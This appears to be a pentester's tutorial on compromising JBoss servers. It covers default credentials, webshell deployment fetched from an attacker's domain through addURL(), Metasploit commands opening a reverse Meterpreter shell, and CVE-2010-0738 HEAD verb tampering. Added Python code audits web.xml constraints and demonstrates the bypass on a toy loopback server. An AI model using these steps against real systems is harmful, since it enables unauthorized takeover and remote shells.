JBoss Pentesting & HTTP Verb Tampering

For about two or three months now I have been pentesting JBoss and Tomcat, and there are a few points that I think are useful for exploiting JBoss. First of all, as with any application server, you can totally own the server by getting into the application server admin console. You have two ways to do this:

  • weak passwords
  • exploiting a vulnerability

JBoss has two kinds of admin console. The first and oldest one is the jmx-console, e.g. http://localhost:8080/jmx-console/

The second one, from JBoss AS 5.1 onward, is the admin-console: http://localhost:8080/admin-console/

JBoss almost always exposes an information-leakage page (the status servlet), very useful for debugging your attempts: http://localhost:8080/status?full=true

Then there is a third console, http://localhost:8080/web-console/. For our purposes this one is only informational, because it relies on the JMX console to deploy and to do anything else, so there is no straight way to use it on its own, even if it has some interesting aspects to analyze.

Weak Passwords

JBoss 4 ships with no password on the jmx-console; on JBoss 5 and later there are default credentials, usually admin/admin.

If you have a file-read primitive, point it at

server\default\deploy\jmx-console.war\WEB-INF\classes\jmx-console-users.properties

(on JBoss 5 and later the same file lives under server\default\conf\props\) and you'll have an easy own.

Deploying a Webshell

To deploy something, you have three choices:

  1. Metasploit, with three modules to choose from:
    1. http://www.metasploit.com/modules/exploit/multi/http/jboss_maindeployer
    2. http://www.metasploit.com/modules/exploit/multi/http/jboss_bshdeployer
    3. http://www.metasploit.com/modules/exploit/multi/http/jboss_deploymentfilerepository
  2. the daytona pack, a stand-alone version of those Metasploit exploits: http://www.exploit-db.com/exploits/17977/
  3. the manual way

With Metasploit it is better to deploy a Meterpreter, as usual. The daytona pack gives you a reverse shell.

Manually, you can check many things, as explained here: http://lab.mediaservice.net/notes_more.php?id=JBOSS_more

To upload a webshell manually, the best way is:

  • get some webspace on a server you control and upload your webshell there (for example wsh4jboss.war; mine is an old-fashioned-style webshell)
  • go to http://localhost:8080/jmx-console/ -> look for DeploymentScanner (the jboss.deployment:type=DeploymentScanner,flavor=URL MBean) -> look for addURL() -> enter http://mydomain/wsh4jboss.war there, then Invoke
  • NOTE: this is the quick way, but the scanner keeps polling that URL and re-downloading the WAR from mydomain, so you can run out of bandwidth
  • to undeploy: http://localhost:8080/jmx-console/ -> jboss.web.deployment -> find your shell -> click it -> stop() and/or destroy()

Why the "manual" way? Because when daytona/Metasploit fails, the target is not necessarily unexploitable :)

HTTP Verb Tampering

You can do anything with the JMX console password (or if the jmx-console has no password at all); but what if you can't get it?

So, do you know what HTTP Verb Tampering is? (I think "Verb Tampering" is the Fortify name for it.) Every J2EE web application has a WEB-INF\web.xml file; it says many things (audit it when you pentest or do code review!!), but what we need is the security-constraint section:

<security-constraint>
  <web-resource-collection>
    <web-resource-name>HtmlAdaptor</web-resource-name>
    <description>An example security config that only allows users with
      the role JBossAdmin to access the HTML JMX console web application</description>
    <url-pattern>/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
  </web-resource-collection>
  <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
</security-constraint>

So, let's understand this piece of XML; what does it say? If you read the Servlet specification, you'll discover that the description is misleading. What the XML actually says is "to access HtmlAdaptor/* with GET or POST, you must have the JBossAdmin role". What it does not say, but means, is "to access HtmlAdaptor/* with HEAD, PUT, DELETE, OPTIONS, TRACE or any other method, you need no role at all": listing <http-method> elements narrows the constraint to exactly those verbs, and every verb not listed is left unprotected.
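To make that audit concrete, here is an added example (mine, not code from the original post or from JBoss) that checks a web.xml the way the paragraph suggests: it parses every security-constraint and reports, per url-pattern, which verbs are left uncovered. The three descriptors are constructed inline: the jmx-console constraint quoted above as shipped, a hardened version with the <http-method> elements removed (a constraint that lists no method covers every verb), and the Servlet 3.1 alternative that keeps the verbs listed but adds <deny-uncovered-http-methods/>.

```python
import xml.etree.ElementTree as ET

# Verbs we check coverage for. Any verb not covered by a constraint is reachable
# without credentials, so arbitrary made-up verbs are uncovered too; this set is
# just what a practitioner would report on.
KNOWN_METHODS = {"GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "TRACE"}

# Constructed descriptor 1: the jmx-console constraint quoted above, as shipped.
WEAK_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""

# Constructed descriptor 2: hardened. With no <http-method> listed, the
# constraint applies to every verb. Namespaced root, to show that parses too.
HARDENED_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""

# Constructed descriptor 3: Servlet 3.1 alternative. Verbs are still listed,
# but the container rejects every verb no constraint covers.
DENY_UNCOVERED_WEB_XML = WEAK_WEB_XML.replace(
    "</web-app>", "  <deny-uncovered-http-methods/>\n</web-app>")


def _local(tag):
    """Strip a namespace ({uri}name -> name) so old and new descriptors both work."""
    return tag.rsplit("}", 1)[-1]


def _texts(parent, name, upper=False):
    """Text of the direct children of `parent` whose local name is `name`."""
    out = []
    for child in parent:
        if _local(child.tag) == name and child.text and child.text.strip():
            text = child.text.strip()
            out.append(text.upper() if upper else text)
    return out


def find_uncovered_methods(web_xml):
    """Return {url-pattern: [uncovered verbs]} for every pattern that has a gap.

    A constraint listing <http-method> covers only those verbs; one listing
    <http-method-omission> covers everything except those; one listing neither
    covers every verb. Coverage is unioned across all constraints for a pattern.
    """
    root = ET.fromstring(web_xml)
    if any(_local(e.tag) == "deny-uncovered-http-methods" for e in root):
        return {}  # the container itself rejects anything not covered

    coverage = {}
    for sc in (e for e in root.iter() if _local(e.tag) == "security-constraint"):
        if not any(_local(e.tag) == "auth-constraint" for e in sc):
            continue  # no auth-constraint: this constraint restricts nothing
        for wrc in (e for e in sc if _local(e.tag) == "web-resource-collection"):
            listed = set(_texts(wrc, "http-method", upper=True))
            omitted = set(_texts(wrc, "http-method-omission", upper=True))
            if listed:
                covered = listed
            elif omitted:
                covered = KNOWN_METHODS - omitted
            else:
                covered = set(KNOWN_METHODS)
            for pattern in _texts(wrc, "url-pattern"):
                coverage[pattern] = coverage.get(pattern, set()) | covered

    return {p: sorted(KNOWN_METHODS - c) for p, c in coverage.items()
            if KNOWN_METHODS - c}


if __name__ == "__main__":
    for label, xml in (("weak", WEAK_WEB_XML), ("hardened", HARDENED_WEB_XML),
                       ("deny-uncovered", DENY_UNCOVERED_WEB_XML)):
        print(label, find_uncovered_methods(xml))
```

Run against the shipped jmx-console descriptor it reports HEAD, PUT, DELETE, OPTIONS and TRACE as uncovered for /*; both fixed descriptors report nothing. Of the two fixes, dropping the <http-method> elements works on every Servlet version, while <deny-uncovered-http-methods/> needs a Servlet 3.1 container.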

What can you do with HEAD/PUT/...? In Java a servlet (HtmlAdaptor is the main JMX console servlet) extends HttpServlet and overrides doGet(...), doPost(...), doPut(...) and so on to serve a specific HTTP verb; a verb it does not override falls through to HttpServlet's default, which is an error response (405 Method Not Allowed). A JSP, on the other hand, is served through its single _jspService() method whatever the verb, so a JSP is more exposed than a servlet. So it is very unlikely you will be able to modify a file or put a file on the AS through PUT...

But HEAD is like GET, except that you won't see the response body: HttpServlet's default doHead() simply calls doGet() and discards the output, so any action the console performs on a GET is also performed on an unauthenticated HEAD --> the requests you would send to the jmx-console can be sent with HEAD instead --> this is the "JBoss exploitation technique" (CVE-2010-0738).
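The following added example (mine, not the post's or JBoss's code) reproduces that mechanism with Python's standard library instead of a real JBoss: a toy console bound to loopback whose "container" authenticates only GET and POST, exactly as the web.xml above does, and whose HEAD handler delegates to the GET logic the way HttpServlet.doHead() does. Probing the same URL with GET, POST and HEAD yields 401, 401 and 200, and the "invocation" side effect is recorded for the HEAD request even though no body comes back. The credentials, paths and the action parameter are made up for the demonstration.

```python
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed credentials for the toy console (hypothetical, not JBoss defaults).
VALID_AUTH = "Basic " + base64.b64encode(b"admin:s3cret").decode()
# The verbs the weak web.xml constrains: every other verb skips authentication.
CONSTRAINED_METHODS = {"GET", "POST"}


class ToyConsole(BaseHTTPRequestHandler):
    """Mimics HtmlAdaptor behind <http-method>GET</http-method><http-method>POST</http-method>."""

    invocations = []  # (verb, path) of every action that actually executed

    def _authorized(self):
        # Container-level decision: unconstrained verbs are never challenged.
        if self.command not in CONSTRAINED_METHODS:
            return True
        return self.headers.get("Authorization") == VALID_AUTH

    def _process(self, send_body):
        if not self._authorized():
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="JMX Console"')
            self.end_headers()
            return
        if "action=invoke" in self.path:  # hypothetical action parameter
            ToyConsole.invocations.append((self.command, self.path))
        body = b"<html>JMX console</html>"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if send_body:
            self.wfile.write(body)

    def do_GET(self):
        self._process(send_body=True)

    def do_POST(self):
        self._process(send_body=True)

    def do_HEAD(self):
        # HttpServlet.doHead() default: run doGet() and drop the body. The
        # authorization decision was already made per verb, so it is skipped.
        self._process(send_body=False)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_console():
    """Start the toy console on an ephemeral loopback port in a daemon thread."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), ToyConsole)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def probe_verbs(host, port, path, verbs=("GET", "POST", "HEAD")):
    """Send the same unauthenticated request with each verb; return {verb: status}."""
    results = {}
    for verb in verbs:
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request(verb, path)
        resp = conn.getresponse()
        resp.read()
        results[verb] = resp.status
        conn.close()
    return results


def demo():
    """Probe the toy console without credentials and return the status per verb."""
    ToyConsole.invocations.clear()
    server = start_console()
    try:
        host, port = server.server_address
        return probe_verbs(host, port, "/jmx-console/HtmlAdaptor?action=invoke&name=toy")
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())
    print(ToyConsole.invocations)
```

The same probe_verbs() comparison is what you run against a real target: an endpoint that returns 401 for GET but 200 for HEAD (or for an arbitrary verb) is constrained by method list, and the mitigation is the web.xml change described above, not anything in the servlet code.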

With Metasploit, all three modules listed above support changing the HTTP verb through the VERB option:

msf > use exploit/multi/http/jboss_maindeployer
msf exploit(jboss_maindeployer) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(jboss_maindeployer) > set LHOST [MY IP ADDRESS]
msf exploit(jboss_maindeployer) > set RHOST [TARGET IP]
msf exploit(jboss_maindeployer) > set VERB HEAD
msf exploit(jboss_maindeployer) > exploit

Remember to check the /status?full=true page ;)
